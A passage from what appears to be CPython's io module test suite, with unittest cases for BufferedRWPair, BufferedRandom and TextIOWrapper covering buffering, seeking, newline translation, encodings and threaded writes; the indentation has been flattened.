self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
